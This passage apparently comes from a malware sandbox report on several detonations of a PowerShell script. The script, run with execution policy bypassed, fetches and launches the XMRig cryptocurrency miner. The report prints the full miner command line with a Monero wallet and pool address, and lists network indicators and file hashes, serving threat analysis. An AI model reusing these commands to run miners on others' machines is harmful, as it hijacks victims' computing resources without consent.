N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jjemn3ph.ayq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:40

Platform

win10-20240404-en

Max time kernel

1789s

Max time network

1755s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hm0kkoby.4g1.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:40

Platform

win10v2004-20240426-en

Max time kernel

1790s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qz0yzo1x.r41.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3
